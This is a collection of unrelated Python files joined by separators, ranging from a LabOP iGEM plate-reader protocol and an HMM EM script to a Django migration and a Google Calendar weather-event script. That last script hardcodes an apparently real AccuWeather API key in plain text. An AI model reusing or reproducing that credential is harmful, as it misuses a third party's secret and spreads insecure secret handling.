f_f = mod.get_function("add_helper_float")
f_d = mod.get_function("add_helper_double")
def add3d_local_foult(a_local: np.ndarray, b: np.ndarray) -> None:
"""
a_local += b
Parameters
----------
a_local 三维矢量,原地加法
b 三维矢量
Returns None
-------
"""
f_f(drv.InOut(a_local), drv.In(b), block=(1, 1, 1), grid=(1, 1))
def add3d_local_double(a_local: np.ndarray, b: np.ndarray) -> None:
"""
a_local += b
Parameters
----------
a_local 三维矢量,原地加法
b 三维矢量
Returns None
-------
"""
f_d(drv.InOut(a_local), drv.In(b), block=(1, 1, 1), grid=(1, 1))
|
class Demo:
def __init__(self, v1=11, v2=22):
self.__a = v1
self.__b = v2
def get_a(self):
return self.__a
def get_b(self):
return self.__b
def set_a(self, value):
self.__a = value
def set_b(self, value):
self.__b = value
def do_something(self):
return self.__a + self.__b
d = Demo(11)
print(d.do_something())
d.set_a(5)
print(d.do_something())
# 檔名: class_demo7.py
# 作者: Kaiching Chang
# 時間: July, 2014
|
def communication_module(packet):
p1 = int(packet[8:12])
p2 = int(packet[12:16])
a = {'0':p1+p2, 'B':p1-p2, 'C':p1*p2}
t = a[packet[4]]
if t > 9999:
t = str('9999')
elif t < 0:
t = str('0000')
else:
t = str(t)
return packet[0:4] + 'FFFF' + str((4-len(t)) * '0') + str(t) + '0000' + packet[-4:]
'''
We need you to implement a method of receiving commands over a network,
processing the information and responding.
Our device will send a single packet to you containing data and an instruction
which you must perform before returning your reply.
To keep things simple, we will be passing a single "packet" as a string.
Each "byte" contained in the packet is represented by 4 chars.
One packet is structured as below:
Header Instruction Data1 Data2 Footer
------ ------ ------ ------ ------
H1H1 0F12 0012 0008 F4F4
------ ------ ------ ------ ------
The string received in this case would be - "H1H10F1200120008F4F4"
Instruction: The calculation you should perform, always one of the below.
0F12 = Addition
B7A2 = Subtraction
C3D9 = Multiplication
FFFF = This instruction code should be used to identify your return value.
The Header and Footer are unique identifiers which you must use to form your reply.
Data1 and Data2 are the decimal representation of the data you should apply
your instruction to. i.e 0109 = 109.
Your response must include the received header/footer, a "FFFF" instruction code,
and the result of your calculation stored in Data1.
Data2 should be zero'd out to "0000".
To give a complete example:
If you receive message "H1H10F1200120008F4F4".
The correct response would be "H1H1FFFF00200000F4F4"
In the event that your calculation produces a negative result, the value returned
should be "0000", similarily if the value is above 9999 you should return "9999".
'''
|
"""
http://2018.igem.org/wiki/images/0/09/2018_InterLab_Plate_Reader_Protocol.pdf
"""
import json
import sys
from urllib.parse import quote
import sbol3
from tyto import OM
import labop
import uml
from labop.execution_engine import ExecutionEngine
from labop_convert import MarkdownSpecialization
def render_kit_coordinates_table(ex: labop.ProtocolExecution):
# Get iGEM parts from Document
components = [
c
for c in ex.document.objects
if type(c) is sbol3.Component and "igem" in c.types[0]
]
# Extract kit coordinates from description, assuming description has the following
# format: 'BBa_I20270 Kit Plate 1 Well 1A'
components = [
(
c.description.split(" ")[0], # Part ID
" ".join(c.description.split(" ")[1:]),
) # Kit coordinates
for c in components
]
# Format markdown table
table = (
"#### Table 1: Part Locations in Distribution Kit\n"
"| Part | Coordinate |\n"
"| ---- | -------------- |\n"
)
for part, coordinate in components:
table += f"|{part}|{coordinate}|\n"
table += "\n\n"
# Insert into markdown document immediately before the Protocol Steps section
insert_index = ex.markdown.find("## Protocol Steps")
ex.markdown = ex.markdown[:insert_index] + table + ex.markdown[insert_index:]
if "unittest" in sys.modules:
REGENERATE_ARTIFACTS = False
else:
REGENERATE_ARTIFACTS = True
filename = "".join(__file__.split(".py")[0].split("/")[-1:])
doc = sbol3.Document()
sbol3.set_namespace("http://igem.org/engineering/")
#############################################
# Import the primitive libraries
print("Importing libraries")
labop.import_library("liquid_handling")
print("... Imported liquid handling")
labop.import_library("plate_handling")
# print('... Imported plate handling')
labop.import_library("spectrophotometry")
print("... Imported spectrophotometry")
labop.import_library("sample_arrays")
print("... Imported sample arrays")
labop.import_library("culturing")
#############################################
# create the materials to be provisioned
dh5alpha = sbol3.Component("dh5alpha", "https://identifiers.org/taxonomy:668369")
dh5alpha.name = "_E. coli_ DH5 alpha"
doc.add(dh5alpha)
lb_cam = sbol3.Component("lb_cam", "")
lb_cam.name = "LB Broth+chloramphenicol"
doc.add(lb_cam)
chloramphenicol = sbol3.Component(
"chloramphenicol", "https://pubchem.ncbi.nlm.nih.gov/compound/5959"
)
chloramphenicol.name = "chloramphenicol"
doc.add(chloramphenicol)
neg_control_plasmid = sbol3.Component(
"neg_control_plasmid", "http://parts.igem.org/Part:BBa_J428100"
)
neg_control_plasmid.name = "Negative control 2022"
neg_control_plasmid.description = "BBa_J428100 Kit Plate 1 Well 12M"
pos_control_green_plasmid = sbol3.Component(
"pos_control_green_plasmid", "http://parts.igem.org/Part:BBa_J428112"
)
pos_control_green_plasmid.name = "Positive control 2022 Green"
pos_control_green_plasmid.description = (
"3_Colors_ins_K2656022 BBa_J428112 Kit Plate 1 Well 14C"
)
pos_control_red_plasmid = sbol3.Component(
"pos_control_red_plasmid", "http://parts.igem.org/Part:BBa_J428101"
)
pos_control_red_plasmid.name = "Positive control red (mCherry) Exp 2"
pos_control_red_plasmid.description = "BBa_J428101 Kit Plate 1 Well 12I"
test_device1 = sbol3.Component("test_device1", "http://parts.igem.org/Part:BBa_J428106")
test_device1.name = "Test Device 1 Exp 2 (Dual construct Green and Blue)"
test_device1.description = "BBa_J428106 Kit Plate 1 Well 12G"
test_device2 = sbol3.Component("test_device2", "http://parts.igem.org/Part:BBa_J428107")
test_device2.name = "Test Device 2 Exp 2 (Dual construct Green and Red)"
test_device2.description = "BBa_J428107 Kit Plate 1 Well 3L"
test_device3 = sbol3.Component("test_device3", "http://parts.igem.org/Part:BBa_J428105")
test_device3.name = "Test Device 3 Exp 2 (Dual construct Red and Blue)"
test_device3.description = "BBa_J428105 Kit Plate 1 Well 5J"
test_device4 = sbol3.Component("test_device4", "http://parts.igem.org/Part:BBa_J428108")
test_device4.name = "Test Device 4 Exp 2 (Dual construct Blue and Red)"
test_device4.description = "BBa_J428108 Kit Plate 1 Well 14E"
test_device5 = sbol3.Component("test_device5", "http://parts.igem.org/Part:BBa_J428104")
test_device5.name = "Test Device 5 Exp 2 (Dual construct Red and Green)"
test_device5.description = "DC_R_ins_K2656022 BBa_J428104 Kit Plate 1 Well 5L"
doc.add(neg_control_plasmid)
doc.add(pos_control_green_plasmid)
doc.add(pos_control_red_plasmid)
doc.add(test_device1)
doc.add(test_device2)
doc.add(test_device3)
doc.add(test_device4)
doc.add(test_device5)
protocol = labop.Protocol("interlab")
protocol.name = "Using the three color calibration protocol: Does the order of transcritional units influence their expression strength?"
protocol.version = sbol3.TextProperty(
protocol, "http://igem.org/interlab_working_group#Version", 0, 1, [], "1.0b"
)
protocol.description = """In this experiment, your team will measure the fluorescence of six devices that encode two fluorescence proteins in two transcriptional units. The devices differ in the order of the transcriptional units. You will calibrate the fluorescence of these devices to the calibrant dyes and the optical density of the culture to the cell density calibrant.
This experiment aims to assess the lab-to-lab reproducibility of the three color calibration protocol when two fluorescent proteins are expressed in the same cell. Besides this technical question, it also adresses a fundamental synthetic biology question: does the order of the transcritional units (that encode for the two different fluorescent proteins) on the devices influence their expression levels?"""
doc.add(protocol)
protocol = doc.find(protocol.identity)
plasmids = [
neg_control_plasmid,
pos_control_green_plasmid,
pos_control_red_plasmid,
test_device1,
test_device2,
test_device3,
test_device4,
test_device5,
]
# Day 1: Transformation
transformation = protocol.primitive_step(
f"Transform", host=dh5alpha, dna=plasmids, selection_medium=lb_cam
)
# Day 2: Pick colonies and culture overnight
culture_container_day1 = protocol.primitive_step(
"ContainerSet",
quantity=2 * len(plasmids),
specification=labop.ContainerSpec(
"culture_day_1",
name=f"culture (day 1)",
queryString="cont:CultureTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
overnight_culture = protocol.primitive_step(
"Culture",
inoculum=transformation.output_pin("transformants"),
replicates=2,
growth_medium=lb_cam,
volume=sbol3.Measure(5, OM.millilitre), # Actually 5-10 ml in the written protocol
duration=sbol3.Measure(16, OM.hour), # Actually 16-18 hours
orbital_shake_speed=sbol3.Measure(220, None), # No unit for RPM or inverse minutes
temperature=sbol3.Measure(37, OM.degree_Celsius),
container=culture_container_day1.output_pin("samples"),
)
# Day 3 culture
culture_container_day2 = protocol.primitive_step(
"ContainerSet",
quantity=2 * len(plasmids),
specification=labop.ContainerSpec(
"culture_day_2",
name=f"culture (day 2)",
queryString="cont:CultureTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
back_dilution = protocol.primitive_step(
"Dilute",
source=culture_container_day1.output_pin("samples"),
destination=culture_container_day2.output_pin("samples"),
replicates=2,
diluent=lb_cam,
amount=sbol3.Measure(5.0, OM.millilitre),
dilution_factor=uml.LiteralInteger(value=10),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
# Transfer cultures to a microplate baseline measurement and outgrowth
timepoint_0hrs = protocol.primitive_step(
"ContainerSet",
quantity=2 * len(plasmids),
specification=labop.ContainerSpec(
"culture_0hr_timepoint",
name="cultures (0 hr timepoint)",
queryString="cont:MicrofugeTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
hold = protocol.primitive_step(
"Hold",
location=timepoint_0hrs.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
hold.description = "This will prevent cell growth while transferring samples."
transfer = protocol.primitive_step(
"Transfer",
source=culture_container_day2.output_pin("samples"),
destination=timepoint_0hrs.output_pin("samples"),
amount=sbol3.Measure(1, OM.milliliter),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
baseline_absorbance = protocol.primitive_step(
"MeasureAbsorbance",
samples=timepoint_0hrs.output_pin("samples"),
wavelength=sbol3.Measure(600, OM.nanometer),
)
baseline_absorbance.name = "baseline absorbance of culture (day 2)"
conical_tube = protocol.primitive_step(
"ContainerSet",
quantity=2 * len(plasmids),
specification=labop.ContainerSpec(
"back_diluted_culture",
name=f"back-diluted culture",
queryString="cont:50mlConicalTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
conical_tube.description = (
"The conical tube should be opaque, amber-colored, or covered with foil."
)
dilution = protocol.primitive_step(
"DiluteToTargetOD",
source=culture_container_day2.output_pin("samples"),
destination=conical_tube.output_pin("samples"),
diluent=lb_cam,
amount=sbol3.Measure(12, OM.millilitre),
target_od=sbol3.Measure(0.02, None),
temperature=sbol3.Measure(4, OM.degree_Celsius),
) # Dilute to a target OD of 0.2, opaque container
dilution.description = " Use the provided Excel sheet to calculate this dilution. Reliability of the dilution upon Abs600 measurement: should stay between 0.1-0.9"
embedded_image = protocol.primitive_step(
"EmbeddedImage", image="/Users/bbartley/Dev/git/sd2/labop/fig1_cell_calibration.png"
)
temporary = protocol.primitive_step(
"ContainerSet",
quantity=2 * len(plasmids),
specification=labop.ContainerSpec(
"back_diluted_culture_aliquots",
name="back-diluted culture aliquots",
queryString="cont:MicrofugeTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
hold = protocol.primitive_step(
"Hold",
location=temporary.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
hold.description = "This will prevent cell growth while transferring samples."
transfer = protocol.primitive_step(
"Transfer",
source=conical_tube.output_pin("samples"),
destination=temporary.output_pin("samples"),
amount=sbol3.Measure(1, OM.milliliter),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
plate1 = protocol.primitive_step(
"EmptyContainer",
specification=labop.ContainerSpec(
"plate_1",
name="plate 1",
queryString="cont:Plate96Well",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
hold = protocol.primitive_step(
"Hold",
location=plate1.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
plan = labop.SampleData(
values=quote(
json.dumps(
{
"1": "A2:D2",
"2": "E2:H2",
"3": "A3:D3",
"4": "E3:H3",
"5": "A4:D4",
"6": "E4:H4",
"7": "A5:D5",
"8": "E5:H5",
"9": "A7:D7",
"10": "E7:H7",
"11": "A8:D8",
"12": "E8:H8",
"13": "A9:D9",
"14": "E9:H9",
"15": "A10:D10",
"16": "E10:H10",
}
)
)
)
transfer = protocol.primitive_step(
"TransferByMap",
source=timepoint_0hrs.output_pin("samples"),
destination=plate1.output_pin("samples"),
amount=sbol3.Measure(100, OM.microliter),
temperature=sbol3.Measure(4, OM.degree_Celsius),
plan=plan,
)
transfer.description = "See also the plate layout below."
plate_blanks = protocol.primitive_step(
"Transfer",
source=[lb_cam],
destination=plate1.output_pin("samples"),
coordinates="A1:H1, A10:H10, A12:H12",
temperature=sbol3.Measure(4, OM.degree_Celsius),
amount=sbol3.Measure(100, OM.microliter),
)
plate_blanks.description = "These samples are blanks."
embedded_image = protocol.primitive_step(
"EmbeddedImage", image="/Users/bbartley/Dev/git/sd2/labop/fig2_cell_calibration.png"
)
# Possibly display map here
absorbance_plate1 = protocol.primitive_step(
"MeasureAbsorbance",
samples=plate1.output_pin("samples"),
wavelength=sbol3.Measure(600, OM.nanometer),
)
absorbance_plate1.name = "0 hr absorbance timepoint"
fluorescence_plate1 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate1.output_pin("samples"),
excitationWavelength=sbol3.Measure(488, OM.nanometer),
emissionWavelength=sbol3.Measure(530, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(30, OM.nanometer),
)
fluorescence_plate1.name = "0 hr green fluorescence timepoint"
fluorescence_blue_plate1 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate1.output_pin("samples"),
excitationWavelength=sbol3.Measure(405, OM.nanometer),
emissionWavelength=sbol3.Measure(450, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(50, OM.nanometer),
)
fluorescence_blue_plate1.name = "0 hr blue fluorescence timepoint"
fluorescence_red_plate1 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate1.output_pin("samples"),
excitationWavelength=sbol3.Measure(561, OM.nanometer),
emissionWavelength=sbol3.Measure(610, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(20, OM.nanometer),
)
fluorescence_red_plate1.name = "0 hr red fluorescence timepoint"
# Begin outgrowth
incubate = protocol.primitive_step(
"Incubate",
location=conical_tube.output_pin("samples"),
duration=sbol3.Measure(6, OM.hour),
temperature=sbol3.Measure(37, OM.degree_Celsius),
shakingFrequency=sbol3.Measure(220, None),
)
# Hold on ice to inhibit cell growth
hold = protocol.primitive_step(
"Hold",
location=timepoint_0hrs.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
hold.description = (
"This will inhibit cell growth during the subsequent pipetting steps."
)
# Take a 6hr timepoint measurement
timepoint_6hrs = protocol.primitive_step(
"ContainerSet",
quantity=len(plasmids) * 2,
specification=labop.ContainerSpec(
"timepoint_6hr",
name=f"6hr timepoint",
queryString="cont:MicrofugeTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
plate2 = protocol.primitive_step(
"EmptyContainer",
specification=labop.ContainerSpec(
"plate_2",
name="plate 2",
queryString="cont:Plate96Well",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
# Hold on ice
hold = protocol.primitive_step(
"Hold",
location=timepoint_6hrs.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
hold.description = "This will prevent cell growth while transferring samples."
hold = protocol.primitive_step(
"Hold",
location=plate2.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
transfer = protocol.primitive_step(
"Transfer",
source=conical_tube.output_pin("samples"),
destination=timepoint_6hrs.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
amount=sbol3.Measure(1, OM.milliliter),
)
plan = labop.SampleData(
values=quote(
json.dumps(
{
"1": "A2:D2",
"2": "E2:H2",
"3": "A3:D3",
"4": "E3:H3",
"5": "A4:D4",
"6": "E4:H4",
"7": "A5:D5",
"8": "E5:H5",
"9": "A7:D7",
"10": "E7:H7",
"11": "A8:D8",
"12": "E8:H8",
"13": "A9:D9",
"14": "E9:H9",
"15": "A10:D10",
"16": "E10:H10",
}
)
)
)
transfer = protocol.primitive_step(
"TransferByMap",
source=timepoint_6hrs.output_pin("samples"),
destination=plate2.output_pin("samples"),
amount=sbol3.Measure(100, OM.microliter),
temperature=sbol3.Measure(4, OM.degree_Celsius),
plan=plan,
)
transfer.description = "See the plate layout."
# Plate the blanks
plate_blanks = protocol.primitive_step(
"Transfer",
source=[lb_cam],
destination=plate2.output_pin("samples"),
coordinates="A1:H1, A10:H10, A12:H12",
temperature=sbol3.Measure(4, OM.degree_Celsius),
amount=sbol3.Measure(100, OM.microliter),
)
plate_blanks.description = "These are the blanks."
endpoint_absorbance_plate2 = protocol.primitive_step(
"MeasureAbsorbance",
samples=plate2.output_pin("samples"),
wavelength=sbol3.Measure(600, OM.nanometer),
)
endpoint_absorbance_plate2.name = "6 hr absorbance timepoint"
endpoint_fluorescence_plate2 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate2.output_pin("samples"),
excitationWavelength=sbol3.Measure(485, OM.nanometer),
emissionWavelength=sbol3.Measure(530, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(30, OM.nanometer),
)
endpoint_fluorescence_plate2.name = "6 hr green fluorescence timepoint"
endpoint_fluorescence_blue_plate2 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate2.output_pin("samples"),
excitationWavelength=sbol3.Measure(405, OM.nanometer),
emissionWavelength=sbol3.Measure(450, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(50, OM.nanometer),
)
endpoint_fluorescence_blue_plate2.name = "6 hr blue fluorescence timepoint"
endpoint_fluorescence_red_plate2 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate2.output_pin("samples"),
excitationWavelength=sbol3.Measure(561, OM.nanometer),
emissionWavelength=sbol3.Measure(610, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(20, OM.nanometer),
)
endpoint_fluorescence_red_plate2.name = "6 hr red fluorescence timepoint"
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=baseline_absorbance.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=absorbance_plate1.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=fluorescence_plate1.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=fluorescence_blue_plate1.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=fluorescence_red_plate1.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=endpoint_absorbance_plate2.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=endpoint_fluorescence_plate2.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=endpoint_fluorescence_blue_plate2.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=endpoint_fluorescence_red_plate2.output_pin("measurements"),
)
agent = sbol3.Agent("test_agent")
ee = ExecutionEngine(
specializations=[MarkdownSpecialization("test_LUDOX_markdown.md")],
failsafe=False,
sample_format="json",
)
execution = ee.execute(protocol, agent, id="test_execution", parameter_values=[])
# Post-process the markdown to add a table that shows where each
# iGEM part is contained in the parts distribution kit
render_kit_coordinates_table(execution)
print(execution.markdown)
execution.markdown = execution.markdown.replace("`_E. coli_", "_`E. coli`_ `")
if REGENERATE_ARTIFACTS:
with open(filename + ".md", "w", encoding="utf-8") as f:
f.write(execution.markdown)
|
from flask import Flask, render_template, request
from flask_bootstrap import Bootstrap
app = Flask(__name__)
Bootstrap(app)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/query', methods = ['POST'])
def query():
query = request.form['q']
# execute amazon asin read codes
return 'query'
if __name__ == '__main__':
app.run(debug = True)
|
class Inventory(object):
def __init__(self, stuff=[]):
self.items = []
self.equips = {0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0, 8:0}
# 1 equip slots:
# 2 head
# 3 torso/arms
# 4 hands
# 5 fingers
# 6 weapon (stuff you actually hold)
# 7 legs
# 8 feet
for i in stuff:
self.items.append(i)
def add_item(self, item):
self.items.append(item)
def remove_item(self, item):
self.items.remove(item)
def equip_item(self, item, slot):
if item not in self.items:
return False
else:
if self.equips[slot] != 0:
return False
else:
self.equips[slot] = item
return "You equip the " + item.description + " " + item.name
def unequip_item(self, item, slot):
if item not in self.items:
return False
|
import scipy.io
import numpy as np
import matplotlib.pyplot as plt
import aux_functions
import EM
file = scipy.io.loadmat('./observed.mat')
X = file['observed']
N = np.shape(X)[0] # number of sequences 10
D = np.shape(X[0][0])[0] # dimension of sequences 6
T = np.shape(X[0][0])[1] # length of each sequence 100
max_it = 100
Ks_list = [2,3,4,5] #[2,3,4,5]
Num_inis = 3
max_it= 100
converged = False
num_k = len(Ks_list)
ll_ks_opt = []
A_ks_opt = []
B_ks_opt = []
pi_ks_opt = []
gamma_ks_opt = []
pb_ks_opt = []
for K in Ks_list:
print('--------------------------')
print(' K = '+str(K))
print('--------------------------')
ll_inis = np.zeros((Num_inis,1))
pi_est_inis = np.zeros((Num_inis,1,K))
#pi_est_inis = np.zeros((Num_inis))
A_est_inis = np.zeros((Num_inis,K,K))
B_est_inis = np.zeros((Num_inis,K,D))
gamma_inis = np.zeros((Num_inis,N,K,T))
pb_inis = np.zeros((Num_inis, N, K, T))
Q_total = []
for ini in range(Num_inis):
pi_est = np.zeros((1, K))
A_est = np.zeros((K, K))
B_est = np.zeros((K, D))
gamma = np.zeros((N,K,T))
pb = np.zeros((N, K, T))
print('--------- Initialization: '+str(ini)+' ---------\n\n')
# Parameter initialization
[pi_ini,A_ini,B_ini] = aux_functions.initialize(K, D)
[pi_est, A_est, B_est, gamma, Q_tot, Q, pb] = EM.EM_algorithm(X,pi_ini,A_ini,B_ini, N, max_it ,ini)
pi_est_inis[ini,:,:] = pi_est
A_est_inis[ini,:,:] = A_est
B_est_inis[ini,:,:] = B_est
gamma_inis[ini,:,:,:] = gamma
ll_inis[ini] = Q
pb_inis[ini,:,:,:] = pb
Q_total.append(Q_tot)
# Best model for all iterations and one particular inicialization
ini_opt = np.argmax(ll_inis)
ll_ks_opt.append(ll_inis[ini_opt][0])
A_ks_opt.append(A_est_inis[ini_opt])
B_ks_opt.append(B_est_inis[ini_opt])
pi_ks_opt.append(pi_est_inis[ini_opt])
gamma_ks_opt.append(gamma_inis[ini_opt])
pb_ks_opt.append(pb_inis[ini_opt])
# Best model (best K)
k_opt = np.argmax(ll_ks_opt) + Ks_list[0]
print('----- OPTIMAL K: '+str(k_opt)+'------')
ll_k_opt = ll_ks_opt[k_opt-Ks_list[0]]
A_k_opt = A_ks_opt[k_opt-Ks_list[0]]
B_k_opt = B_ks_opt[k_opt-Ks_list[0]]
pi_k_opt = pi_ks_opt[k_opt-Ks_list[0]]
gamma_opt = gamma_ks_opt[k_opt-Ks_list[0]]
pb_opt = pb_ks_opt[k_opt-Ks_list[0]]
# FOR DECODING: UNCOMMENT AND TRY WITH JUST ONE K
'''
# MAP decoder (FB algorithm)
states_MAP = aux_functions.MAP_decoder(gamma_opt)
# ML decoder (viterbi)
states_ML = aux_functions.Viterbi_decoder(pi_k_opt, A_k_opt, pb_opt)
print(' States MAP decoder \n')
print(states_MAP)
print(' States Viterbi decoder \n')
print(states_ML)
for n in range(N):
x = np.linspace(0,T,100)
plt.plot(x,states_MAP[n],'-',label = 'MAP decoder')
plt.plot(x, states_ML[n],'--',label = 'Viterbi decoder')
plt.xlabel('Observations')
plt.ylabel('Sequence '+str(n))
plt.title(' MAP and Viterbi sequence decoder for K='+str(K))
plt.legend(loc='upper right')
plt.savefig('Decoded_sequence_K' + str(K)+'_N='+str(n))
plt.show()
'''
|
def solution(prices):
answer = [0 for i in range(len(prices))]
index = []
for i in range(len(prices)):
for j in index.copy():
if prices[j] > prices[i]:
answer[j] = i - j
index.remove(j)
if i == len(prices)-1:
answer[j] = len(prices) - j - 1
index.append(i)
return answer
|
from azureml.widgets import RunDetails
RunDetails(run).show()
run.wait_for_completion(show_output=True)
|
# Generated by Django 3.1.2 on 2020-11-06 15:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Episode',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('show_id', models.CharField(max_length=255, unique=True)),
],
),
migrations.CreateModel(
name='Note',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('category', models.CharField(choices=[('TSTP', 'Timestamp'), ('LNK', 'Link')], max_length=4)),
('episode', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='episodes.episode')),
],
),
]
|
import csv
''' ESCREVE OS LUGARES
places_file = open("/home/mateus/Documents/TESIIII/versao_final_en/places.txt", "r").read().splitlines()
with open('/home/mateus/Documents/TESIIII/mydata.csv', 'w') as mycsvfile:
writer = csv.writer(mycsvfile, quoting=csv.QUOTE_ALL)
writer.writerow(["PLACES:"])
for place in places_file:
writer.writerow([place])'''
''' ESCREVE AS PESSOAS
persons_file = open("/home/mateus/Documents/TESIIII/versao_final_en/persons.txt", "r").read().splitlines()
with open('/home/mateus/Documents/TESIIII/persons.csv', 'w') as mycsvfile:
writer = csv.writer(mycsvfile, quoting=csv.QUOTE_ALL)
writer.writerow(["PERSONS:"])
for person in persons_file:
writer.writerow([person])'''
# ESCREVE AS RELACOES
'''relations_file = open("/home/mateus/Documents/TESIIII/versao_final_en/relations.txt", "r").read().splitlines()
with open('/home/mateus/Documents/TESIIII/relations.csv', 'w') as mycsvfile:
writer = csv.writer(mycsvfile, quoting=csv.QUOTE_ALL)
writer.writerow(["RELATIONS:"])
for relation in relations_file:
writer.writerow([relation])'''
|
"""
Infix parsing with operator precedence (inefficient implementation).
"""
from parson import Grammar, recur, seclude, either, fail
def PrececedenceParser(primary_expr, table):
return foldr(lambda make_expr, subexpr: make_expr(subexpr),
primary_expr,
table)
def LeftAssoc(*pairs):
return lambda subexpr: \
seclude(subexpr + alt([peg + subexpr + oper
for peg, oper in pairs]).star())
def RightAssoc(*pairs):
return lambda subexpr: \
recur(lambda expr:
seclude(subexpr + alt([peg + expr + oper
for peg, oper in pairs]).maybe()))
def alt(pegs):
return foldr(either, fail, pegs)
def foldr(f, z, xs):
for x in reversed(xs):
z = f(x, z)
return z
# eg_calc.py example
from operator import *
from parson import delay
_ = delay(lambda: g._)
exp3 = delay(lambda: g.exp3)
exp1 = PrececedenceParser(exp3, [
LeftAssoc(('*'+_, mul), ('//'+_, div), ('/'+_, truediv), ('%'+_, mod)),
RightAssoc(('^'+_, pow)),
])
exps = PrececedenceParser(exp1, [
LeftAssoc(('+'+_, add), ('-'+_, sub)),
])
g = Grammar(r"""
top = _ :exps !/./.
exp3 : '('_ :exps ')'_
| '-'_ :exp1 :neg
| /(\d+)/_ :int.
_ = /\s*/.
""")(**globals())
## g.top('42 *(5-3) + -2^2')
#. (80,)
## g.top('2^3^2')
#. (512,)
## g.top('5-3-1')
#. (1,)
## g.top('3//2')
#. (1,)
## g.top('3/2')
#. (1.5,)
|
import datetime
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import requests
import json
import os
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/calendar.events', ]
POSTAL_CODE_ENDPOINT = 'http://dataservice.accuweather.com/locations/v1/postalcodes/search?'
FORECAST_ENDPOINT = 'http://dataservice.accuweather.com/forecasts/v1/daily/5day'
API_KEY = 'tFebxs08CTJJGx1E3HwSpIEqGGElXsaN'
ZIP_CODE = '20147'
def remove_event(service,_id):
event_id = service.events().delete(calendarId='primary', eventId=_id).execute()
def main():
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('calendar', 'v3', credentials=creds)
# Call the Calendar API
location_api_call = '{}apikey={}&q={}'.format(POSTAL_CODE_ENDPOINT,
API_KEY,
ZIP_CODE)
location_response = requests.get(location_api_call)
location_key = location_response.json()[0]['Key']
forecast_api_call = '{}/{}?apikey={}'.format(FORECAST_ENDPOINT,location_key,API_KEY)
forecast_response = requests.get(forecast_api_call)
#print(forecast_response.json())
events = []
timezone = { 'timeZone': 'America/Los_Angeles'}
daily_forecasts = forecast_response.json()['DailyForecasts']
for forecast in daily_forecasts:
event ={}
start = {}
end = {}
high = int(forecast['Temperature']['Maximum']['Value'])
low = int(forecast['Temperature']['Minimum']['Value'])
weather = forecast['Day']['IconPhrase']
event_summary = '{} {} / {}'.format(weather,high,low)
event['summary'] = event_summary
date = forecast['Date'].split('T')[0]
start['date'] = date
start['timeZone'] = timezone
end['date'] = date
end['timeZone'] = timezone
event['start'] = start
event['end'] = end
events.append(event)
'''
event = {
'summary': 'Sunny and 75',
'start': {
'date': '2019-12-15',
'timeZone': 'America/Los_Angeles',
},
'end': {
'date': '2019-12-15',
'timeZone': 'America/Los_Angeles',
},
}
'''
